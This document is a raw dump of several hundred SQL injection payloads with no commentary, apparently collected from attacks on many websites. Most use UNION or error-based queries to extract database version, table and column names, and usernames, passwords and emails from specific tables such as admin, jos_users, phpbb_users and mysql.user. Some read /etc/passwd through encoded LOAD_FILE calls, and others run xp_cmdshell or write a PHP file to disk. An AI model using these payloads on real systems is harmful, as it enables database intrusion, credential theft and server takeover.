1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* 1-0.1 UNION SELECT CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -10204 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53 -- 1020 and 1020=-1 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* -1020 union all select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8-- -1021 union select 1,2,3,concat_ws(char(58),user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/* -10220 union select CONCAT_WS(CHAR(32,58,32 ),user(),database(), version()),null,2-- -10253 union select 1, group_concat(user,0x3a,pass,0x3a,email,0x3a,status,0x3a,lastlogin),3,4,5,6,7,8,9,10,11,12,13,14 from login-- -10254 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,unhex(hex(concat(version(),0x3a3a,user(),0x3a3a,database()))),7,8,9/* 1028 UNION SELECT 1,2,3,4,5,6,7,8,9,10,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),12,13,14,15,16,17,18,19,20-- 1029000' union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18/* 102 and 1=0 union select 1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables -- -102 and 1=2 union all select 1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database(),@@version_compile_os),0x71),0x71),5,6,7,8,9,10-- 102 and ascii(substring((select 1 from user limit 1),1,1))>1-- -102 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102 from mysql.user/* -102' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(login,0x3a,password,0x3a,email),20,21,22,23 from user limit 2,1/* -102 union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=0x6e6576736b695f6e6576-- -102 union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13-- -102 union select 1,2,3,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),5,6,7/* -102 union select 1,2,3,User(),4,5,version(),7,9,database()/* -102 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9-- 102 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6-- 102' union select 1,2,user(),4,5,6,7 user/* 102 union select 1,concat(0x3a,version(),user(),database()) limit 1,1 -102 union select 1,concat(login,0x3a,pass,0x3a,ip) from my8pref_adm_usr limit 0,1/* 102' union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 limit 1,1/* -102 union select 1,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),3,4,5,6,7,8,9,10-- 102 union select null,null,null,null,concat_ws(0x20,user(),database(),version()),null,null,null,null,null,null,null,null,null,null/* 10301' or 1=(select top 1 table_name from information_schema.tables where table_name not in ('Pages_MusicalShop','sysconstraints','syssegments','Bewertungen','D99_Tmp','Tab_Artikel','Tab_Artikel_BACKUP','Tab_Musicalnews','Tab_MusicalHistory','Tab_MusicalPremieren','Tab_Musicals','Tab_Musicaltickets','Tab_Playbacks','Tab_Premieren','Tab_Soundclips','Tab_Soundtracks'))-- -103259' union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)-- -1032 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13-- -10359 union select 1,2,3,pass,5,6,7,8,9,10 from Sql222170_1.admin -- -1036 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13,14,15,16 -- -103788 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -1038 union select 1,2,3,4,5,6,concat(user,char(58),password),8,9,10 from mysql.user/* 103935156219689000 UNION SELECT 1,2,concat_ws(0x3a ,user(),database(),version()),4,5,6,7,8,9,10,11,12-- 1039695 union select 1,group_concat(user,0x3a,password,0x3a,file_priv,0x3a,host),3,4 from mysql.user-- -1039 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 103 and 1=0 union select 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema='iskra-6' -- 103 and 1=2 union select 1,2,3,4,concat_ws(0x3a,loginname,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from phplist_admin -- -103' UNION SELECT 0,concat_ws(0x0b,user(),version(),database()),2,3,4,5,6,7,8,9,10 -- -103 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 103 union select 1,2,group_concat(username,password,0x3a3a),4,5,6,7,8,9,10 from tbl_users -- -103 union select 1,concat(username,0x2a,password),3,4 from admin -103 union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4 from members/* -103 union select 1,concat_ws(0x3a,username,password),3,4 from admin-- -103 UNION SELECT 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* -103 union select 1,convert(concat_ws(char(58),user(),version(),database()) using latin1),3,4,5,6,7,8 from mysql.user/* -103 union select 1,group_concat(username),3,group_concat(password) from admin -- -1040 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8 -- 1041 and substring(version(),1,1)=5-- 1041 union select 1,2,concat(0x2,version(),user(),database()),4,5,6,7,8,9,10,11 limit 1,1 -1044 union select 1,2,3,4,l_username,l_password from login/* -1044 union select 1,concat_ws(0x3a,login,password) from webturizm.tfirm limit 1,1 -- -104544 union select 1,2,3,LOAD_FILE(0x2f6574632f706173737764),5,6,7,8,9,10,11,12,13,14,15,16,17,19,20,21,22,23,24,25,26,27,28,29,30,31/* 1045 UnIon selECt 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 -- 104739 and 1=2 UNION ALL SELECT concat(username,0x3a,password),2,3,4,5 from site_users where user_id=2-- -10486 union select 1,2,3,group_concat(column_name,0x3C62723E SEPARATOR 0x0b),5,6,7,8,9,10,11,12,13,14 FROM information_schema.columns WHERE table_schema=0x3435303739385F696E32617274 AND table_name=0x6D656D62657273-- -1048 union select 1,2,aes_decrypt(aes_encrypt(concat(user(),version(),database(),@@version_compile_os),1),1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97 from user-- 104-999.9 union select 1,version(),3,4,5,6,7,8,9,10,11 -- -1049 union select group_concat(uEmail,0x3a,uPassword) from tb_user -104 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6-- -104 union select 1,2,3,4,5,concat_ws(0x3a,nick,passwort),7,8,9,10 from user limit 0,1-- -104 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10-- -104 union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os) -104 union select 1,2,3,concat_ws(0x3a,version(),user()),5,6,7,8,9,10,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82-- -104' union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,0,11,12,13,14,15,16,17 from users limit 0,1-- -104 union select 1,2,unhex(hex(version())),4,5-- 104 union select concat_ws(0x3a,g_id,g_userName,g_fullName,g_hashedPassword,g_email,g_language,g_locked) from g2_User-- -104 union select concat_ws(0x7c,user(),0x7c,database(),0x7c,version()) -- -104 union select group_concat(0x3C494E4A5F494E464F3E,user(),0x3a,database(),0x3a,version(),0x3C494E4A5F494E464F3E),2,3,4,5,6,7,8-- -104 union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46/* -1050/**/union/**/select/**/1,2,3,4,concat(username,char(58),password),6,7,8,9,10,11,12,13,14 from admin/* -1051 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database()),10,11,12 1053 and 1=2 UnIon selECt 1,2,concat_ws(username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from admins-- 1054 UNION SELECT 1,2,3,4,5,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),7,8,9,10,11,12,13 LIMIT 1,1-- -1055 UNION SELECT 1,2,3,concat_ws(0x3a,version(),user(),database()),5 FROM information_schema.tables/* -1057 union select 1,2,3,4,5,6,concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()),8,9,10,11,12,13,14,15 -- -10591 union select 1,2,3,4,5,6,7,8,9,user()-- -10595 union select 1,2,3,4,5,concat(nick,0x3a,passwd),7,8,9 from _user limit 0,1/* 105-999.9 union select 1,2,concat(0x3a,version(),0x3a,database(),0x3a,user()),4,5,6-- 105-999.9 union select 1,version(),database(),4,5,6,7,8-- 105 and 1=2 union select 1,2,3,4,5,6 -- 105 and 1=2 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -- -105 union select 1,2,3,4,5,6-- 105' union select 1,2,3,4,5,6/* -105 union select 1,2,3,4,5,6,7,8,9,0,1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3/* -105' union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,admin_login,admin_passwd) from administrators/* -105 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()) -105 union select 1,2,3,4,5,6,version()-- -105 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38-- -105 union select 1,2,concat_ws(0x3203a20,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15/* -105 union select 1,2,group_concat(table_name separator 0x0b),4,5,6,7,8 from information_schema.tables where table_schema=0x6170706975735f6462-- -105 union select 1,2,@@version,4,5,6,7,group_concat(table_name),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from information_schema.tables -- -105 union select 1,concat(user(),char(58),version(),char(58),database())/* -105 union select 1,concat_ws(0x3a ,user(),database(),version()),3,4,5,6,7,8,9,10 from users limit 0,1/* -105 UNION SELECT 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7 from ivj_users limit 0,1-- -105 union select concat_ws(0x2f,version(),user(),database()),2,3/* 106-007-0093-001' union select 1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/* -10606 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(version(),char(58,58),database(),char(58,58),user()),18,19,20,21,22,23,24,25,26/* 1061' and 1=0 UnIon selECt 1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17 from admin -- 1062 UNION SELECT 1,2,3,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),5,6,7,8,9,10-- 1063-999.9 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 1064802412 union select 1,version(),3 from user limit 1,1 1064999 union select 1,2,3,4,concat(id,char(58),name,char(58),email),6,7,8,9,10,11,12,13 from users limit 5,60/* -1065 union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3 -1066 union select 1,2,3,concat_ws(0x3a3a,admin_id,admin_firstname,admin_lastname,admin_email_address,admin_password,admin_type),5,6,7,8,9,10,11,12,13,14,15 from admin -- 10671' UNION SELECT 1,2,3,version(),user(),6,7,8,9/* -10679 union select 1,2,3,4,5,user()-- 1067 and 2=1 union select 1,2,3,4,version(),6,7,8,9# 1068325882'union select null,null,null,null,null,null,null/* -1068 union select group_concat(0x0b,table_name),2,3 from information_schema.tables-- -10694 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45/* 106969540 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13-- -1069' union select 1,2,3,4,5,group_concat(table_name) from information_schema.tables -- 106 AND ASCII(SUBSTRING((current_database()),6,1))=xxx-- -106 union select 0x7c2d31303620756e696f6e2073656c65637420312c276861636b6564272c3320696e746f206f757466696c6520272f746d702f616e7469636861742e70687027202d2d207c,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,0x27,0x27-- -106 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database()),18/* -106' union select 1,2,3,4,concat_ws(0x3a3a,adminid,username,password),6,7,8,9,10,11,12,13,14,15,16 from newsadmin -- -106 union select 1,2,3,concat_ws(0x3a3a,login,password,nom,prenom,email,admin),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from utilisateur -- -106 union select 1,2,3,(select concat_ws(0x3a,user(),version(),database())),5 -- -106 union select 1,group_concat(table_name) from information_schema.tables group by table_schema -- -106 union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6,7 -1072 UNION SELECT 1,2,concat(login,0x3b,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from login/* 1073' and 1=0 UnIon 1073 and 1=0 UNION SELECT 1,2,3,convert(version() using latin1),5,6,7,8 -- -1073 UNION SELECT null,null,null,version(),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/ -1074 union select 1,2,3,4,5,6,7,8,9,10,11 from pmnl_temp -- -1074 union select 1,2,3,4,concat_ws(0x3a3a,user(),database(),version()),6,7,8,9,10,11,12,13,14 1075' and 1=0 union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables Where table_schema='magelan_base' -- 1075 union select 1 limit 1,1/* -1075 union select 1,password,3,4,5,6,7,8,9,0,1,2,13 from users/* 1077 and 1=0 Union Select UNHEX(HEX(version())) ,2,3 -- -1078 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x2,version(),database(),user()),23,24-- -1079' union select 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables /* 107 or(1,2)=(select count(*),concat(( select concat(user(),0x3a,version(),0x3a,database(),0x3a,username,0x3a,password) from users limit 0,1),0x3a,floor(rand()*2)) from information_schema.columns group by 2 limit 0,1)-- -107 union select 1,2-- -107 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3A3a,password),12 from administrators/* -107 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),database(),version()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34-- -107 union select 1,2,3,4,concat_ws(0x203a20,version( ),database(),user(),@@version_compile_os),6,7,8-- -107 union select 1,2,3,4,concat_ws(0x3a,VERSION(),DATABASE(),USER()),6,7,8,9,10,11,12,13 -107 union select 1,2,3,4,group_concat(name,0x3a,passward),6,7,8,9,10,11 from users-- -107 union select 1,2,3,4,version(),6,7,8,9,0,1,2,3,4,5/* -107 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* -107 union select 1,concat(version(),0x20,database(),0x20,user()),3,4,5,6-- -107' union select 1,concat_ws(0x3A3a,version(),database(),user()),3,4,5,6,7,8,9,10/* -107' union select 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables /* -107 union select 1,group_concat(user,char(58),pass),3 from frpatb_net.admin_user-- 107 union select concat(0x3a,version(),user(),database()),2/* 108098097650 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -1081 union select 1,concat_ws(0x3a3a3a,username,password),3,4 from m_admin limit 0,10 -- 10824 union select concat(username,0x2b,password) FROM users/* -1086/**/union/**/select/**/1,22,23,24,column_name,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/**/from/**/information_schema.columns where table_name=0x70617970616C5F636172745F696E666F limit 0,1-- -108891 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- 1088' UNION SELECT 0,concat_ws(0x0b,user(),version(),database()) -- 108-999.9 union select 1,2,version(),4,5,6 -- 1089' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/* 108 aNd 1=0 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12 -- 108' and 1=0 union select 1,version(),database(),user(),5,6,7,8,9,10,11,12,13,14,15 -- 108 and 1=2 UNION SELECT 1,2,3,concat(database(),0x3a,user(),0x3a,version()),5,6,7,8,9,10 -- -108 union select 1,2,3,4,5,6,7,concat_ws(0x3a3a,email,nom_site,url_site,login,pass,statut),9,10,11 from spip_auteurs -- 108 union select 1,2,3,4,5 from users-- -108' union select 1,2,concat(user(),0x3a,version(),0x3a,database(),0x3a)/* -108 union select 1,2,concat(user_login,char(58),user_pass),4,5,6,7,8,9,10,11,12 from new_users -- -108 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from jos_users/* -108 union select 1,concat(version(),0x20,database(),0x20,user()),3,4,5-- -108' union select 1,database(),3,4,5,6,7,8,9,10,11,12 -- 108' union select 1,version(),null,null,null,null,null,null,null,null,null,null,null,null-- -10908 union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -1093 union select 1 -- #1094 and 3=substirng(version(),1,1) -1094 union select 1,2,3,4,5,6,version(),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,42 from mysql.user/* -109597 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17-- -1095 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 from mysql.user/* -1095 union select 1,2,3,4,5,user(),7,8,9,10,11,12,13/* -1095 union select 1,table_name,3,4,5,6,7 from information_schema.tables -- -1096031090' union select 1,2,pass,4,5,6,login from users -- 109777778840 UNION SELECT 1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT CONCAT(id,0x3a,username,0x3a,hash,0x3a,access) FROM circlem_db.users LIMIT 5,1),0x3a),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -10984 UNION SELECT 1,2,unhex(hex(concat_ws(0x3a,version(),database(),user(),@@version_compile_os))),4,5,6,7,8,9/* -1098 union select 1,concat_ws(0x0b,version(),user(),database()),3,4,5 10-999.9 union select 1,2,concat_ws(user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15-- 10-999.9 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15 -- 1099' aNd 1=0 UNION SELECT 1,2,3,version(),5,6,7,8 -- 1099 union select concat_ws(0x3,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 109 and 1=0 union select 1,2,concat_ws(0x3a,username,password),4 from tb_users-- -109 or(1,1)=(select count(0),concat((select version() from information_schema.tables limit 0,1),floor(rand(0)*2))from(information_schema.tables)group by 2)-- -109;select cast(username||chr(58)||password as int),null,null,null,null,null,null,null from sites limit 1 offset 1 -109 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws(0x3a3a,version(),user(),database()),21,22,23,24,25,26 -- -109 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database())-- -109 union select 1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10,11 from relod_users/* -109 union select 1,concat_ws(0x3a3a,version(),user(),database()),3/* -109 union select 1,concat_ws(0x3a,id_user,login,pass),3,4,5,6,7,8,9,10,11 from users limit 0,1-- -109 union select 1,password,login,4,5 from admins/* 10 and 10=0 union select 1,2,3,4,5,6,7/* 10 and 1=0 union select 11,22,login,pass from users/* 10 and 1=0 union select 1,2,version(),4,5 -- 10 and(1=0)union(select(1),version(),3,4,5,6,7,8,9,10,11,12,13)-- 10 and 1=0 union select concat_ws(0x3a3a3a,user(),database(),version()) -- 10 and 1=0 union select concat_ws(0x3a,loginid,password,type),2,3,4,5 from adminuser_ece 10 and (1,2)=(select * from(select name_const(version(),1),name_const(version(),1))x)-- 10 and 1=2 union all select 1,2,3,4,concat(0x3a,username,password),6 from editor-- -10 and 1=2 union select 1,2,3,4,5,6,7,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),9 -- 10' AND 1=2 UNION SELECT 1,2,version(),4,5,6,7,8,9,10 # 10' or(1,1)=(select * from(select name_const((select table_name from information_schema.tables WHERE table_name LIKE '%25user%25' LIMIT 0,1),1),name_const((select table_name from information_schema.tables WHERE table_name LIKE '%25user%25' LIMIT 0,1),1))a)/* 10 or 1=(select TOP 1 column_name from information_schema.columns where table_name='FORUM_MEMBERS' and column_name not in ('MEMBER_ID','M_STATUS','M_NAME','M_USERNAME','M_PASSWORD','M_EMAIL','M_COUNTRY','M_HOMEPAGE','M_SIG','M_DEFAULT_VIEW','M_LEVEL','M_AIM','M_YAHOO','M_ICQ'))-- -10 order by 1/* 10 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select concat_ws(0x3a,version(),database(),user()) from eusers limit 0,1),1,63), FLOOR(RAND(0)*2)))-- -10 UNION ALL SELECT 1,0x494E43,0x494E43,concat(@@version,0x3a,user(),0x3a,database(),0x3a,@@version_compile_os),5,6,7-- 10 UNION exec master..xp_cmdshell 'dir' -10 UNION SELECT 0,1,concat_Ws(0x0b,user(),database(),version()),3,4,5 -- -10' union select 0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2/* -10 union select 1,2,3 -- -10 union select 1,2,3,4,5, -10 union select 1,2,3,4,5,6-- -10' union select 1,2,3,4,5,6-- -10 union select 1,2,3,4,5,6,7,8,9,10,11,12-- -10 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- -10 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user())-- -10 union select 1,2,3,4,5,6,7,8,group_concat(million_system_staff_Password),group_concat(million_system_staff_UserName),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from million_system_staff -- -10 union select 1,2,3,4,5,6,7,group_concat(us_login,0x3a,us_pass,0x0b),9,10,11,12,13,14,15,16,17 from ei_users -10 union select 1,2,3,4,5,6,7,password,9,10,11,12,13,14,15,16,17,18 FROM Admins -- -10 union select 1,2,3,4,5,6,concat(password,0x3a,username),8 from users/* 10 UNION SELECT 1,2,3,4,5,6,concat(user,0x3a,password),8,9,10,11,12,13,14 FROM mysql.user/* -10 union select 1,2,3,4,5,6,concat(version(),0x3e,user(),0x3e),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* -10 union select 1,2,3,4,5,6,concat_ws(0x3a,USER(),DATABASE(),VERSION()),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8-- -10 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8-- -10 union select 1,2,3,4,5,6,(concat_ws(0x3a,version(),database(),user())),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -10 union select 1,2,3,4,5,6,tAbLe_nAmE,8,9,10 FrOm InFoRmAtIoN_ScHeMa.tAbLeS LiMiT 28,2 -10 union select 1,2,3,4,5,concat(user,char(58),password),7,8,9,10 from mysql.user 10 union select 1,2,3,4,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),6,7,8,9-- -10 union select 1,2,3,4,concat(email,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,null from access# -10 union select 1,2,3,4,concat(login,char(58),password),6,7,8,9 from usuarios/* 10' union select 1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8,9,10,11,12 limit 1,1/* -10' union select 1,2,3,4,concat_ws(0x0b,version(),user(),database()),6,7-- -10' union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()) -- -10 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),6,7,8-- -10 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7-- -10 union select 1,2,3,4,convert(version() using latin1),6,7,8,9,10 10 union select 1,2,3,4,group_concat(0x0b,column_name),6 from information_schema.columns where table_name=0x7573657273 -10 union select 1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13,14,15,16,null from information_schema.columns where table_name=0x616363657373-- -10 union select 1,2,3,4,group_concat(concat_Ws(0x3a,loginName,password)),6,7,8,9,10,11,12,13,14,15,16 from flyingweb.flyingweb_admin_user-- -10 union select 1,2,3,4,group_concat(table_name) from information_schema.tables-- -10' union select 1,2,3,4,pass,id,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 from users/* -10 union select 1,2,3,4,user(),6,7,8 -- -10 union select 1,2,3,concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9,10-- -10 union select 1,2,3,concat_ws(0x2f,user(),version(),database())/* -10 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -- -10 UNION SELECT 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12-- -10 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- -10' union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5-- -10 UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94-- -10 union select 1,2,3,concat_ws(char(58,58),user(),database(),version())-- -10 union select 1,2,3,concat_ws(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10/* -10 union select 1,2,3,group_concat(0x0b,name,0x3a,pass),5,6 from usrpsw -- -10 union select 1,2,3,group_concat(user(),0x0b,database(),0x0b,version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 10 union select 1,2,3,table_name from INFORMATION_SCHEMA.TABLES LIMIT 1,1-- 10 uNIOn sELECT 1,2,3,version(),5,6,7,8,9,10 -- 10 union select 1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),@@version_compile_os,@@version_compile_machine,@@version_comment),1),1),4,5 -10 union select 1,2,aes_decrypt(aes_encrypt(version(),0x61),0x61),4,5,6,7,8,9,10,11,12 -- -10 union select 1,2,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),4-- -10 union select 1,2,concat(admin,0x20,admin_pw),4,5,6,7 from phpads_config-- -10 union select 1,2,concat(table_name,0x3a3a3a) from information_schema.tables/* -10 union select 1,2,concat(user,0x3a,password),4,5,6,7 from mysql.user/* -10 union select 1,2,concat(user_email,char(58),user_icq,char(58),user_password),4,user_password from phpbb_users 